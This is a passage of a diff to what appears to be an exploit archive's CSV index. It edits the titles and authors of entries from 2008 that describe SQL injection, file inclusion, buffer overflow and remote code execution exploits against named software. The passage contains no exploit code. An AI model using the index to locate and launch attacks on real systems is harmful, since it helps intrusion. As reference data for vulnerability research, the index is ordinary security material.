UnixWare Merge mcd Local Root Exploit",2008-04-04,qaaz,sco,local,0 @@ -5015,7 +5015,7 @@ id,file,description,date,author,platform,type,port 5381,platforms/php/webapps/5381.txt,"Blog PixelMotion (modif_config.php) Remote File Upload Vulnerability",2008-04-06,JiKo,php,webapps,0 5382,platforms/php/webapps/5382.txt,"Blog PixelMotion (index.php categorie) SQL Injection Vulnerability",2008-04-06,parad0x,php,webapps,0 5383,platforms/php/webapps/5383.txt,"Site Sift Listings (id) Remote SQL Injection Vulnerability",2008-04-06,"S@BUN ",php,webapps,0 -5384,platforms/php/webapps/5384.txt,"Prozilla Top 100 v1.2 Arbitrary Delete Stats Vulnerability",2008-04-06,t0pP8uZz,php,webapps,0 +5384,platforms/php/webapps/5384.txt,"Prozilla Top 100 1.2 - Arbitrary Delete Stats Vulnerability",2008-04-06,t0pP8uZz,php,webapps,0 5385,platforms/php/webapps/5385.txt,"Prozilla Forum Service (forum.php forum) SQL Injection Vulnerability",2008-04-06,t0pP8uZz,php,webapps,0 5386,platforms/linux/remote/5386.txt,"Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit",2008-04-06,"INetCop Security",linux,remote,80 5387,platforms/php/webapps/5387.txt,"Prozilla Reviews Script 1.0 Arbitrary Delete User Vulnerability",2008-04-06,t0pP8uZz,php,webapps,0 @@ -5046,7 +5046,7 @@ id,file,description,date,author,platform,type,port 5413,platforms/php/webapps/5413.txt,"Koobi Pro 6.25 gallery Remote SQL Injection Vulnerability",2008-04-08,"S@BUN ",php,webapps,0 5414,platforms/php/webapps/5414.txt,"Koobi Pro 6.25 showimages Remote SQL Injection Vulnerability",2008-04-08,"S@BUN ",php,webapps,0 5415,platforms/php/webapps/5415.txt,"Koobi 4.4/5.4 gallery Remote SQL Injection Vulnerability",2008-04-08,"S@BUN ",php,webapps,0 -5416,platforms/windows/remote/5416.html,"IBiz E-Banking Integrator V2 ActiveX Edition Insecure Method Exploit",2008-04-09,shinnai,windows,remote,0 +5416,platforms/windows/remote/5416.html,"IBiz E-Banking Integrator 2.0 - ActiveX Edition Insecure Method Exploit",2008-04-09,shinnai,windows,remote,0 5417,platforms/php/webapps/5417.htm,"phpBB Add-on Fishing Cat Portal Remote File Inclusion Exploit",2008-04-09,bd0rk,php,webapps,0 5418,platforms/php/webapps/5418.pl,"KnowledgeQuest 2.5 Arbitrary Add Admin Exploit",2008-04-09,t0pP8uZz,php,webapps,0 5419,platforms/php/webapps/5419.txt,"Free Photo Gallery Site Script (path) File Disclosure Vulnerability",2008-04-09,JiKo,php,webapps,0 @@ -5057,7 +5057,7 @@ id,file,description,date,author,platform,type,port 5424,platforms/linux/local/5424.txt,"Alsaplayer < 0.99.80-rc3 Vorbis Input Local Buffer Overflow Exploit",2008-04-10,"Albert Sellares",linux,local,0 5425,platforms/php/webapps/5425.pl,"LightNEasy 1.2 (no database) Remote Hash Retrieve Exploit",2008-04-10,girex,php,webapps,0 5426,platforms/php/webapps/5426.txt,"RX Maxsoft (popup_img.php fotoID) Remote SQL Injection Vulnerability",2008-04-10,"S@BUN ",php,webapps,0 -5427,platforms/windows/dos/5427.pl,"Borland InterBase 2007 ibserver.exe Buffer Overflow PoC",2008-04-11,"Liu Zhen Hua",windows,dos,0 +5427,platforms/windows/dos/5427.pl,"Borland InterBase 2007 - ibserver.exe Buffer Overflow PoC",2008-04-11,"Liu Zhen Hua",windows,dos,0 5428,platforms/php/webapps/5428.txt,"PHPKB 1.5 Knowledge Base (ID) SQL Injection Vulnerability",2008-04-11,parad0x,php,webapps,0 5429,platforms/php/webapps/5429.txt,"NewsOffice 1.1 Remote File Inclusion Vulnerability",2008-04-11,RoMaNcYxHaCkEr,php,webapps,0 5430,platforms/multiple/remote/5430.txt,"HP OpenView Network Node Manager <= 7.53 Multiple Vulnerabilities",2008-04-11,"Luigi Auriemma",multiple,remote,0 @@ -5075,13 +5075,13 @@ id,file,description,date,author,platform,type,port 5442,platforms/windows/local/5442.cpp,"MS Windows GDI Image Parsing Stack Overflow Exploit (MS08-021)",2008-04-14,Lamhtz,windows,local,0 5443,platforms/php/webapps/5443.txt,"SmallBiz eShop (content_id) Remote SQL Injection Vulnerability",2008-04-14,Stack,php,webapps,0 5444,platforms/php/webapps/5444.txt,"BosClassifieds 3.0 (index.php cat) SQL Injection Vulnerability",2008-04-14,"SoSo H H",php,webapps,0 -5445,platforms/windows/remote/5445.cpp,"HP OpenView NNM v7.5.1 ovalarmsrv.exe Remote Overflow Exploit",2008-04-14,Heretic2,windows,remote,2954 +5445,platforms/windows/remote/5445.cpp,"HP OpenView NNM 7.5.1 - ovalarmsrv.exe Remote Overflow Exploit",2008-04-14,Heretic2,windows,remote,2954 5446,platforms/php/webapps/5446.txt,"BosNews 4.0 (article) Remote SQL Injection Vulnerability",2008-04-14,Crackers_Child,php,webapps,0 5447,platforms/php/webapps/5447.txt,"Koobi CMS 4.2.4/4.2.5/4.3.0 Multiple Remote SQL Injection Vulnerabilities",2008-04-14,JosS,php,webapps,0 5448,platforms/php/webapps/5448.txt,"Koobi Pro 6.25 poll Remote SQL Injection Vulnerability",2008-04-14,"S@BUN ",php,webapps,0 5449,platforms/php/webapps/5449.php,"KwsPHP (Upload) Remote Code Execution Exploit",2008-04-14,Ajax,php,webapps,0 5450,platforms/php/webapps/5450.txt,"Classifieds Caffe (index.php cat_id) SQL Injection Vulnerability",2008-04-15,JosS,php,webapps,0 -5451,platforms/windows/remote/5451.py,"BigAnt Server 2.2 PreAuth Remote SEH Overflow Exploit (0day)",2008-04-15,"Matteo Memelli",windows,remote,6080 +5451,platforms/windows/remote/5451.py,"BigAnt Server 2.2 PreAuth Remote SEH Overflow Exploit (0day)",2008-04-15,ryujin,windows,remote,6080 5452,platforms/php/webapps/5452.txt,"LightNEasy SQLite / no database <= 1.2.2 Multiple Remote Vulnerabilities",2008-04-15,girex,php,webapps,0 5453,platforms/windows/dos/5453.pl,"DivX Player <= 6.7.0 SRT File Buffer Overflow PoC",2008-04-15,securfrog,windows,dos,0 5454,platforms/php/webapps/5454.txt,"Lasernet CMS 1.5 (new) Remote SQL Injection Vulnerability",2008-04-15,cO2,php,webapps,0 @@ -5095,7 +5095,7 @@ id,file,description,date,author,platform,type,port 5462,platforms/windows/local/5462.py,"DivX Player 6.6.0 SRT File SEH Buffer Overflow Exploit",2008-04-18,muts,windows,local,0 5463,platforms/php/webapps/5463.txt,"Grape Statistics 0.2a (location) Remote File Inclusion Vulnerability",2008-04-18,MajnOoNxHaCkEr,php,webapps,0 5464,platforms/php/webapps/5464.txt,"5th Avenue Shopping Cart (category_ID) SQL Injection Vulnerability",2008-04-18,"Aria-Security Team",php,webapps,0 -5465,platforms/php/webapps/5465.txt,"2532|Gigs <= 1.2.2 Arbitrary Database Backup/Download Vulnerability",2008-04-18,t0pP8uZz,php,webapps,0 +5465,platforms/php/webapps/5465.txt,"2532/Gigs <= 1.2.2 - Arbitrary Database Backup/Download Vulnerability",2008-04-18,t0pP8uZz,php,webapps,0 5466,platforms/php/webapps/5466.pl,"OpenInvoice 0.9 Arbitrary Change User Password Exploit",2008-04-18,t0pP8uZz,php,webapps,0 5467,platforms/php/webapps/5467.txt,"PhShoutBox <= 1.5 (final) Insecure Cookie Handling Vulnerability",2008-04-18,t0pP8uZz,php,webapps,0 5468,platforms/php/webapps/5468.txt,"Simple Customer 1.2 (contact.php id) SQL Injection Vulnerability",2008-04-18,t0pP8uZz,php,webapps,0 @@ -5166,7 +5166,7 @@ id,file,description,date,author,platform,type,port 5533,platforms/php/webapps/5533.txt,"BlogMe PHP (comments.php id) SQL Injection Vulnerability",2008-05-03,His0k4,php,webapps,0 5534,platforms/multiple/remote/5534.txt,"HLDS WebMod 0.48 Multiple Remote Vulnerabilties",2008-05-03,"Luigi Auriemma",multiple,remote,0 5535,platforms/php/webapps/5535.txt,"Smartblog (index.php tid) Remote SQL Injection Vulnerability",2008-05-03,His0k4,php,webapps,0 -5536,platforms/windows/remote/5536.php,"HLDS WebMod 0.48 (rconpass) Remote Heap Overflow Exploit",2008-05-03,SkOd,windows,remote,0 +5536,platforms/windows/remote/5536.php,"HLDS WebMod 0.48 (rconpass) Remote Heap Overflow Exploit",2008-05-03,SkOd,windows,remote,0 5537,platforms/php/webapps/5537.txt,"phpDirectorySource 1.1 Multiple Remote SQL Injection Vulnerabilities",2008-05-03,InjEctOr5,php,webapps,0 5538,platforms/php/webapps/5538.txt,"cpLinks 1.03 (bypass/SQL/XXS) Multiple Remote Vulnerabilities",2008-05-04,InjEctOr5,php,webapps,0 5539,platforms/php/webapps/5539.txt,"ScorpNews 1.0 (example.php site) Remote File Inclusion Vulnerability",2008-05-04,Silver,php,webapps,0 @@ -5179,7 +5179,7 @@ id,file,description,date,author,platform,type,port 5546,platforms/php/webapps/5546.txt,"BackLinkSpider (cat_id) Remote SQL Injection Vulnerability",2008-05-05,K-159,php,webapps,0 5547,platforms/windows/dos/5547.txt,"Novell eDirectory < 8.7.3 SP 10 / 8.8.2 HTTP headers DOS Vulnerability",2008-05-05,Nicob,windows,dos,0 5548,platforms/php/webapps/5548.txt,"Miniweb 2.0 (historymonth) Remote SQL Injection Vulnerability",2008-05-05,HaCkeR_EgY,php,webapps,0 -5549,platforms/php/webapps/5549.txt,"Power Editor 2.0 Remote File Disclosure / Edit Vulnerability",2008-05-05,"Virangar Security",php,webapps,0 +5549,platforms/php/webapps/5549.txt,"Power Editor 2.0 Remote File Disclosure / Edit Vulnerability",2008-05-05,"Virangar Security",php,webapps,0 5550,platforms/php/webapps/5550.php,"DeluxeBB <= 1.2 Multiple Remote Vulnerabilities Exploit",2008-05-05,EgiX,php,webapps,0 5551,platforms/php/webapps/5551.txt,"Pre Shopping Mall 1.1 (search.php search) SQL Injection Vulnerability",2008-05-06,t0pP8uZz,php,webapps,0 5552,platforms/php/webapps/5552.txt,"PHPEasyData 1.5.4 (cat_id) Remote SQL Injection Vulnerability",2008-05-06,InjEctOr5,php,webapps,0 @@ -5287,8 +5287,8 @@ id,file,description,date,author,platform,type,port 5661,platforms/php/webapps/5661.txt,"Netious CMS 0.4 (index.php pageid) SQL Injection Vulnerability",2008-05-21,InjEctOr5,php,webapps,0 5662,platforms/cgi/webapps/5662.txt,"Alcatel OmniPCX Office 210/061.1 Remote Command Execution Vuln",2008-05-21,DSecRG,cgi,webapps,0 5663,platforms/php/webapps/5663.txt,"6rbScript (news.php newsid) Remote SQL Injection Vulnerability",2008-05-21,"Hussin X",php,webapps,0 -5664,platforms/php/webapps/5664.txt,"Webl?sninger <= v4 (XSS/SQL) Multiple Remote Vulnerabilities",2008-05-21,Mr.SQL,php,webapps,0 -5665,platforms/php/webapps/5665.txt,"Netbutikker <= v4 Remote SQL Injection Vulnerabilities",2008-05-21,Mr.SQL,php,webapps,0 +5664,platforms/php/webapps/5664.txt,"Webl?sninger <= 4 - (XSS/SQL) Multiple Remote Vulnerabilities",2008-05-21,Mr.SQL,php,webapps,0 +5665,platforms/php/webapps/5665.txt,"Netbutikker <= 4 - Remote SQL Injection Vulnerabilities",2008-05-21,Mr.SQL,php,webapps,0 5666,platforms/php/webapps/5666.txt,"e107 Plugin BLOG Engine 2.2 (uid) Blind SQL Injection Vulnerability",2008-05-22,"Virangar Security",php,webapps,0 5667,platforms/windows/local/5667.py,"VLC 0.8.6d SSA Parsing Double Sh311 Universal Exploit",2008-05-23,j0rgan,windows,local,0 5668,platforms/php/webapps/5668.txt,"Quate CMS 0.3.4 (RFI/LFI/XSS/DT) Multiple Remote Vulnerabilities",2008-05-23,DSecRG,php,webapps,0 @@ -5310,11 +5310,11 @@ id,file,description,date,author,platform,type,port 5684,platforms/php/webapps/5684.txt,"Joomla Component Artist (idgalery) SQL Injection Vulnerability",2008-05-28,Cr@zy_King,php,webapps,0 5685,platforms/php/webapps/5685.txt,"FlashBlog (articulo_id) Remote SQL Injection Vulnerability",2008-05-28,HER0,php,webapps,0 5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader <= 8.1.2 Malformed PDF Remote DOS PoC",2008-05-29,securfrog,windows,dos,0 -5688,platforms/php/webapps/5688.php,"SyntaxCMS <= 1.3 (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0 +5688,platforms/php/webapps/5688.php,"SyntaxCMS <= 1.3 (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0 5689,platforms/php/webapps/5689.txt,"AirvaeCommerce 3.0 (pid) Remote SQL Injection Vulnerability",2008-05-29,QTRinux,php,webapps,0 5690,platforms/php/webapps/5690.txt,"PicoFlat CMS 0.5.9 Local File Inclusion Vulnerabilitty (win)",2008-05-29,gmda,php,webapps,0 5691,platforms/php/webapps/5691.php,"CMS from Scratch <= 1.1.3 (fckeditor) Remote Shell Upload Exploit",2008-05-29,EgiX,php,webapps,0 -5692,platforms/php/webapps/5692.pl,"Mambo Component mambads <= 1.0 RC1 Beta SQL Injection Vulnerability",2008-05-29,Houssamix,php,webapps,0 +5692,platforms/php/webapps/5692.pl,"Mambo Component mambads <= 1.0 RC1 Beta SQL Injection Vulnerability",2008-05-29,Houssamix,php,webapps,0 5693,platforms/php/webapps/5693.txt,"CMS from Scratch <= 1.1.3 (image.php) Directory Traversal Vulnerability",2008-05-29,Stack,php,webapps,0 5694,platforms/windows/remote/5694.cpp,"ASUS DPC Proxy 2.0.0.16/19 Remote Buffer Overflow Exploit",2008-05-29,Heretic2,windows,remote,623 5695,platforms/windows/remote/5695.cpp,"Now SMS/MMS Gateway 5.5 Remote Buffer Overflow Exploit",2008-05-29,Heretic2,windows,remote,8800 @@ -5330,10 +5330,10 @@ id,file,description,date,author,platform,type,port 5705,platforms/asp/webapps/5705.txt,"BP Blog 6.0 (id) Remote Blind SQL Injection Vulnerability",2008-05-31,JosS,asp,webapps,0 5706,platforms/php/webapps/5706.php,"EasyWay CMS (index.php mid) Remote SQL Injection Exploit",2008-05-31,Lidloses_Auge,php,webapps,0 5707,platforms/php/webapps/5707.txt,"Social Site Generator (path) Remote File Inclusion Vulnerability",2008-05-31,vBmad,php,webapps,0 -5708,platforms/php/webapps/5708.txt,"Joomla Component prayercenter <= 1.4.9 (id) SQL Injection Vulnerability",2008-05-31,His0k4,php,webapps,0 +5708,platforms/php/webapps/5708.txt,"Joomla Component prayercenter <= 1.4.9 (id) SQL Injection Vulnerability",2008-05-31,His0k4,php,webapps,0 5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 Remote Stack Overflow PoC (auth)",2008-05-31,securfrog,windows,dos,0 5710,platforms/php/webapps/5710.pl,"Joomla Component com_biblestudy 1.5.0 (id) SQL Injection Exploit",2008-05-31,Stack,php,webapps,0 -5711,platforms/php/webapps/5711.txt,"Social Site Generator v2 Multiple Remote File Disclosure Vulnerabilities",2008-06-01,Stack,php,webapps,0 +5711,platforms/php/webapps/5711.txt,"Social Site Generator 2.0 - Multiple Remote File Disclosure Vulnerabilities",2008-06-01,Stack,php,webapps,0 5712,platforms/multiple/dos/5712.pl,"Samba (client) receive_smb_raw() Buffer Overflow Vulnerability PoC",2008-06-01,"Guido Landi",multiple,dos,0 5713,platforms/php/webapps/5713.txt,"ComicShout 2.8 (news.php news_id) SQL Injection Vulnerability",2008-06-01,JosS,php,webapps,0 5714,platforms/php/webapps/5714.pl,"Joomla Component com_mycontent 1.1.13 Blind SQL Injection Exploit",2008-06-01,His0k4,php,webapps,0 @@ -5371,7 +5371,7 @@ id,file,description,date,author,platform,type,port 5748,platforms/php/webapps/5748.txt,"Joomla Component JoomlaDate (user) SQL injection Vulnerability",2008-06-05,His0k4,php,webapps,0 5749,platforms/multiple/dos/5749.pl,"Asterisk (SIP channel driver / in pedantic mode) Remote Crash Exploit",2008-06-05,"Armando Oliveira",multiple,dos,0 5750,platforms/windows/remote/5750.html,"Black Ice Software Inc Barcode SDK (BIDIB.ocx) Multiple Vulns",2008-06-05,shinnai,windows,remote,0 -5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 (Post Auth) Remote SEH Overflow Exploit",2008-06-06,"Matteo Memelli",windows,remote,22 +5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 (Post Auth) Remote SEH Overflow Exploit",2008-06-06,ryujin,windows,remote,22 5752,platforms/php/webapps/5752.pl,"Joomla Component GameQ <= 4.0 Remote SQL injection Vulnerability",2008-06-07,His0k4,php,webapps,0 5753,platforms/asp/webapps/5753.txt,"JiRo?s FAQ Manager (read.asp fID) SQL Injection Vulnerability",2008-06-08,Zigma,asp,webapps,0 5754,platforms/php/webapps/5754.txt,"PHPInv 0.8.0 (LFI/XSS) Multiple Remote Vulnerabilities",2008-06-08,"CWH Underground",php,webapps,0 @@ -5389,7 +5389,7 @@ id,file,description,date,author,platform,type,port 5766,platforms/php/webapps/5766.txt,"Realm CMS <= 2.3 Multiple Remote Vulnerabilities",2008-06-09,BugReport.IR,php,webapps,0 5767,platforms/php/webapps/5767.php,"Flux CMS <= 1.5.0 (loadsave.php) Remote Arbitrary File Overwrite Exploit",2008-06-09,EgiX,php,webapps,0 5768,platforms/php/webapps/5768.txt,"pNews 2.08 (shownews) Remote SQL Injection Vulnerability",2008-06-09,Cr@zy_King,php,webapps,0 -5769,platforms/php/webapps/5769.pl,"Telephone Directory 2008 Arbitrary Delete Contact Exploit",2008-06-09,Stack,php,webapps,0 +5769,platforms/php/webapps/5769.pl,"Telephone Directory 2008 Arbitrary Delete Contact Exploit",2008-06-09,Stack,php,webapps,0 5770,platforms/php/webapps/5770.php,"Achievo <= 1.3.2 (fckeditor) Arbitrary File Upload Exploit",2008-06-09,EgiX,php,webapps,0 5771,platforms/php/webapps/5771.txt,"ErfurtWiki <= R1.02b (css) Local File Inclusion Vulnerabilities",2008-06-10,Unohope,php,webapps,0 5772,platforms/php/webapps/5772.txt,"DCFM Blog 0.9.4 (comments) Remote SQL Injection Vulnerability",2008-06-10,Unohope,php,webapps,0 @@ -5416,7 +5416,7 @@ id,file,description,date,author,platform,type,port 5793,platforms/windows/remote/5793.html,"muvee autoProducer <= 6.1 (TextOut.dll) ActiveX Remote BOF Exploit",2008-06-12,Nine:Situations:Group,windows,remote,0 5794,platforms/php/webapps/5794.pl,"Clever Copy 3.0 (results.php) Remote SQL Injection Exploit",2008-06-12,n/a,php,webapps,0 5795,platforms/windows/remote/5795.html,"XChat <= 2.8.7b (URI Handler) Remote Code Execution Exploit (ie6/ie7)",2008-06-13,securfrog,windows,remote,0 -5796,platforms/php/webapps/5796.php,"GLLCTS2 <= 4.2.4 (login.php detail) SQL Injection Exploit",2008-06-12,TheDefaced,php,webapps,0 +5796,platforms/php/webapps/5796.php,"GLLCTS2 <= 4.2.4 - (login.php detail) SQL Injection Exploit",2008-06-12,TheDefaced,php,webapps,0 5797,platforms/php/webapps/5797.txt,"Butterfly Organizer 2.0.0 (SQL/XSS) Multiple Remote Vulnerabilities",2008-06-13,"CWH Underground",php,webapps,0 5798,platforms/php/webapps/5798.pl,"WebChamado 1.1 Arbitrary Add Admin Exploit",2008-06-13,"CWH Underground",php,webapps,0 5799,platforms/php/webapps/5799.pl,"Mambo Component galleries 1.0 (aid) Remote SQL Injection Exploit",2008-06-13,Houssamix,php,webapps,0 @@ -5474,7 +5474,7 @@ id,file,description,date,author,platform,type,port 5852,platforms/php/webapps/5852.txt,"netBIOS (showNews.php newsid) SQL Injection Vulnerability",2008-06-18,"security fears team",php,webapps,0 5853,platforms/php/webapps/5853.txt,"Maxtrade AIO 1.3.23 (categori) Remote SQL Injection Vulnerability",2008-06-18,HaCkeR_EgY,php,webapps,0 5854,platforms/php/webapps/5854.txt,"Mybizz-Classifieds (index.php cat) SQL Injection Vulnerability",2008-06-18,HaCkeR_EgY,php,webapps,0 -5855,platforms/php/webapps/5855.txt,"Easy Webstore 1.2 (index.php postid) Remote SQL Injection Vulnerability",2008-06-18,Mr.SQL,php,webapps,0 +5855,platforms/php/webapps/5855.txt,"Easy Webstore 1.2 (index.php postid) Remote SQL Injection Vulnerability",2008-06-18,Mr.SQL,php,webapps,0 5856,platforms/php/webapps/5856.txt,"nweb2fax <= 0.2.7 Multiple Remote Vulnerabilities",2008-06-18,dun,php,webapps,0 5857,platforms/php/webapps/5857.txt,"Carscripts Classifieds (index.php cat) Remote SQL Injection Vulnerability",2008-06-18,Stack,php,webapps,0 5858,platforms/php/webapps/5858.txt,"BoatScripts Classifieds (index.php type) SQL Injection Vulnerability",2008-06-18,Stack,php,webapps,0 @@ -5487,7 +5487,7 @@ id,file,description,date,author,platform,type,port 5865,platforms/php/webapps/5865.txt,"CaupoShop Classic 1.3 (saArticle[ID]) Remote SQL Injection Vulnerability",2008-06-19,n/a,php,webapps,0 5866,platforms/php/webapps/5866.txt,"Lotus Core CMS 1.0.1 Remote File Inclusion Vulnerabilities",2008-06-19,Ciph3r,php,webapps,0 5867,platforms/php/webapps/5867.txt,"AJ Auction Web 2.0 (cate_id) SQL Injection Vulnerability",2008-06-19,"Hussin X",php,webapps,0 -5868,platforms/php/webapps/5868.txt,"AJ Auction v1 (id) Remote SQL Injection Vulnerability",2008-06-19,"Hussin X",php,webapps,0 +5868,platforms/php/webapps/5868.txt,"AJ Auction 1.0 - (id) Remote SQL Injection Vulnerability",2008-06-19,"Hussin X",php,webapps,0 5869,platforms/php/webapps/5869.txt,"Virtual Support Office-XP <= 3.0.29 Multiple Remote Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0 5870,platforms/php/webapps/5870.txt,"GL-SH Deaf Forum <= 6.5.5 Multiple Remote Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0 5871,platforms/php/webapps/5871.txt,"FireAnt 1.3 (index.php page) Local File Inclusion Vulnerability",2008-06-20,cOndemned,php,webapps,0 @@ -5503,7 +5503,7 @@ id,file,description,date,author,platform,type,port 5881,platforms/php/webapps/5881.txt,"@CMS 2.1.1 (readarticle.php article_id) SQL Injection Vulnerability",2008-06-21,Mr.SQL,php,webapps,0 5882,platforms/php/webapps/5882.txt,"eNews 0.1 (delete.php) Arbitrary Delete Post Vulnerability",2008-06-21,"ilker Kandemir",php,webapps,0 5883,platforms/php/webapps/5883.txt,"PHP KnowledgeBase Script 2.4 (cat_id) SQL Injection Vulnerability",2008-06-21,"S.L TEAM",php,webapps,0 -5884,platforms/php/webapps/5884.txt,"Aprox CMS Engine v5(.1.0.4) Local File Inclusion Vulnerability",2008-06-21,SkyOut,php,webapps,0 +5884,platforms/php/webapps/5884.txt,"Aprox CMS Engine 5 (1.0.4) - Local File Inclusion Vulnerability",2008-06-21,SkyOut,php,webapps,0 5885,platforms/php/webapps/5885.pl,"Scientific Image DataBase <= 0.41 Blind SQL Injection Exploit",2008-06-21,t0pP8uZz,php,webapps,0 5886,platforms/php/webapps/5886.pl,"LaserNet CMS <= 1.5 Arbitrary File Upload Exploit",2008-06-21,t0pP8uZz,php,webapps,0 5887,platforms/php/webapps/5887.pl,"LE.CMS <= 1.4 Remote Arbitrary File Upload Exploit",2008-06-21,t0pP8uZz,php,webapps,0 @@ -5536,7 +5536,7 @@ id,file,description,date,author,platform,type,port 5915,platforms/php/webapps/5915.txt,"Joomla Component com_facileforms 1.4.4 RFI Vulnerability",2008-06-23,Kacak,php,webapps,0 5916,platforms/php/webapps/5916.txt,"Dagger CMS 2008 (dir_inc) Remote File Inclusion Vulnerability",2008-06-23,CraCkEr,php,webapps,0 5917,platforms/php/webapps/5917.txt,"TinX CMS 1.1 (LFI/XSS) Multiple Remote Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 -5918,platforms/windows/dos/5918.pl,"uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header DoS Exploit",2008-06-23,Exodus,windows,dos,0 +5918,platforms/windows/dos/5918.pl,"uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header DoS Exploit",2008-06-23,Exodus,windows,dos,0 5919,platforms/php/webapps/5919.txt,"MM Chat 1.5 (LFI/XSS) Multiple Remote Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 5920,platforms/php/webapps/5920.txt,"Ourvideo CMS 9.5 (RFI/LFI/XSS) Multiple Remote Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 5921,platforms/php/webapps/5921.txt,"cmsWorks 2.2 RC4 (mod_root) Remote File Inclusion Vulnerability",2008-06-23,CraCkEr,php,webapps,0 @@ -5610,7 +5610,7 @@ id,file,description,date,author,platform,type,port 5992,platforms/php/webapps/5992.txt,"CMS little (index.php template) Local File Inclusion Vulnerability",2008-07-02,"CWH Underground",php,webapps,0 5993,platforms/php/webapps/5993.txt,"Joomla Component com_brightweblinks (catid) SQL Injection Vulnerability",2008-07-02,His0k4,php,webapps,0 5994,platforms/php/webapps/5994.pl,"Joomla Component QuickTime VR 0.1 Remote SQL Injection Exploit",2008-07-02,Houssamix,php,webapps,0 -5995,platforms/php/webapps/5995.pl,"Joomla Component is 1.0.1 Multiple Remote SQL Injection Exploit",2008-07-02,Houssamix,php,webapps,0 +5995,platforms/php/webapps/5995.pl,"Joomla Component is 1.0.1 Multiple Remote SQL Injection Exploit",2008-07-02,Houssamix,php,webapps,0 5996,platforms/php/webapps/5996.txt,"phPortal 1.2 Multiple Remote File Inclusions Exploit",2008-07-02,Ciph3r,php,webapps,0 5997,platforms/php/webapps/5997.pl,"CMS WebBlizzard (index.php page) Blind SQL Injection Exploit",2008-07-03,Bl@ckbe@rD,php,webapps,0 5998,platforms/php/webapps/5998.txt,"phpWebNews 0.2 MySQL Edition (id_kat) SQL Injection Vulnerability",2008-07-03,storm,php,webapps,0 @@ -5640,12 +5640,12 @@ id,file,description,date,author,platform,type,port 6023,platforms/php/webapps/6023.pl,"BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit",2008-07-08,"CWH Underground",php,webapps,0 6024,platforms/php/webapps/6024.txt,"Boonex Dolphin 6.1.2 Multiple Remote File Inclusion Vulnerabilities",2008-07-08,RoMaNcYxHaCkEr,php,webapps,0 6025,platforms/php/webapps/6025.txt,"Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln",2008-07-08,unknown_styler,php,webapps,0 -6026,platforms/linux/remote/6026.pl,"trixbox (langChoice) Local File Inclusion Exploit (connect-back) v2",2008-07-09,"Jean-Michel BESNARD",linux,remote,80 +6026,platforms/linux/remote/6026.pl,"trixbox (langChoice) - Local File Inclusion Exploit (connect-back) (2)",2008-07-09,"Jean-Michel BESNARD",linux,remote,80 6027,platforms/php/webapps/6027.txt,"Mole Group Last Minute Script <= 4.0 Remote SQL Injection Vulnerability",2008-07-08,t0pP8uZz,php,webapps,0 6028,platforms/php/webapps/6028.txt,"BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability",2008-07-08,RoMaNcYxHaCkEr,php,webapps,0 -6029,platforms/multiple/dos/6029.txt,"Multiple Vendors Malicious SVG File Denial of Service PoC",2008-07-08,"Kristian Hermansen",multiple,dos,0 +6029,platforms/multiple/dos/6029.txt,"Multiple Vendors (Firefox/Evince/EOG/Gimp) - (.SVG) Denial of Service PoC",2008-07-08,"Kristian Hermansen",multiple,dos,0 6030,platforms/windows/local/6030.py,"Download Accelerator Plus - DAP 8.x (m3u) Local BOF Exploit 0day",2008-07-08,h07,windows,local,0 -6031,platforms/windows/local/6031.asm,"OllyDBG v1.10 and ImpREC v1.7f (export name) BOF PoC",2008-07-08,Defsanguje,windows,local,0 +6031,platforms/windows/local/6031.asm,"OllyDBG 1.10 and ImpREC 1.7f - (export name) BOF PoC",2008-07-08,Defsanguje,windows,local,0 6032,platforms/linux/local/6032.py,"Poppler <= 0.8.4 libpoppler uninitialized pointer Code Execution PoC",2008-07-08,"Felipe Andres Manzano",linux,local,0 6033,platforms/php/webapps/6033.pl,"AuraCMS <= 2.2.2 (pages_data.php) Arbitrary Edit/Add/Delete Exploit",2008-07-09,k1tk4t,php,webapps,0 6034,platforms/php/webapps/6034.txt,"Dreampics Builder (page) Remote SQL Injection Vulnerability",2008-07-09,"Hussin X",php,webapps,0 @@ -5703,7 +5703,7 @@ id,file,description,date,author,platform,type,port 6088,platforms/php/webapps/6088.txt,"tplSoccerSite 1.0 Multiple Remote SQL Injection Vulnerabilities",2008-07-16,Mr.SQL,php,webapps,0 6089,platforms/windows/remote/6089.pl,"Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit",2008-07-17,Kingcope,windows,remote,80 6090,platforms/windows/dos/6090.html,"PPMate PPMedia Class ActiveX Control Buffer Overflow PoC",2008-07-17,"Guido Landi",windows,dos,0 -6091,platforms/php/webapps/6091.txt,"phpHoo3 <= 5.2.6 (phpHoo3.php viewCat) SQL injection Vulnerability",2008-07-17,Mr.SQL,php,webapps,0 +6091,platforms/php/webapps/6091.txt,"phpHoo3 <= 5.2.6 - (phpHoo3.php viewCat) SQL injection Vulnerability",2008-07-17,Mr.SQL,php,webapps,0 6092,platforms/php/webapps/6092.txt,"AlstraSoft Video Share Enterprise 4.5.1 (UID) SQL Injection Vulnerability",2008-07-17,"Hussin X",php,webapps,0 6094,platforms/linux/remote/6094.txt,"Debian OpenSSH Remote SELinux Privilege Elevation Exploit (auth)",2008-07-17,eliteboy,linux,remote,0 6095,platforms/php/webapps/6095.pl,"AlstraSoft Article Manager Pro 1.6 Blind SQL Injection Exploit",2008-07-17,GoLd_M,php,webapps,0 @@ -5729,7 +5729,7 @@ id,file,description,date,author,platform,type,port 6115,platforms/php/webapps/6115.txt,"EZWebAlbum Insecure Cookie Handling Vulnerability",2008-07-21,"Virangar Security",php,webapps,0 6116,platforms/windows/remote/6116.pl,"IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit",2008-07-22,"Guido Landi",windows,remote,0 6117,platforms/php/webapps/6117.txt,"YouTube 